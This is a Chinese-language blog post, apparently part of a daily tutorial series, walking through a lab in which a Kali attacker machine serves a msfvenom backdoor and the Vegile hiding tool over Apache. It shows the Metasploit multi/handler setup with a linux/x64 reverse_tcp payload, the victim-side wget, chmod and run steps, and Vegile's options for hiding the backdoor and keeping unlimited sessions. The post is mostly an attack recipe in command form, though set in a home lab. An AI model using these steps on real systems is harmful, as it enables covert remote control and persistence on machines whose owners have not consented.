哈罗~
昨天我们用msfvenom建立了一个後门,
将其传送到受害端的主机,
只要受害端运行了该程序,
就会建立TCP连线,并自动连回我们的主机。
我们便可以透过连线来控制目标。
另外,也透过git clone把Vegile下载到电脑。
今天就来接续昨天的实作吧~
环境:
Kali ─ 攻击方(192.168.168.131)
Parrot ─ 受害方(192.168.168.129)
将昨天的 後门 & Vegile 都移至/var/ww/html目录下。
cp backdoor /var/www/html
cp -r Vegile /var/www/html
为了模拟从受害端连回去server下载工具,记得要启动apache。
systemctl start apache2
接下来我们执行msf控制台,使用exploit/multi/handler开始监听。
msfconsole
use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
set lhost [要连回的攻击者ip]
set lport 777
run
wget [攻击者ip]/Vegile
wget [攻击者ip]/backdoor
Vegile --i backdoor
时发现有错误...chmod +x Vegile
chmod +x backdoor
./Vegile --i backdoor
Vegile这个工具的指令其实很简单,
只有以下三个参数:
参数 | 说明 |
---|---|
-i | 隐藏後门 |
-u | 开启无限Session |
-h | 功能查询 |
走罗! 高歌离席~
<<: 看焰火罗~ Vaadin 内嵌 iFrame 不跑版自动缩放 - day25
在我们使用 标签样板字面值 可解决 XSS攻击 这里我们先来介绍简单的 标签样板字面值 依据在样板字...
接续昨天的介绍,再加入一些控制与互动 今日 Demo / 参考效果:奇异博士 只要能用程序控制的,就...
这张照片是程序视讯课的背景图,3月时在山上人家拍的樱花 相信这类的转职故事大家应该看过很多吧? 但...
Day10 接下来,要帮 Squid 也装上 Laser, 敌人的 Laser 跟我们的外观是不一样...
通过本文,您将能够解决Windows 10/8/7中的“硬碟仅显示少量容量”问题,并使用“Bitwa...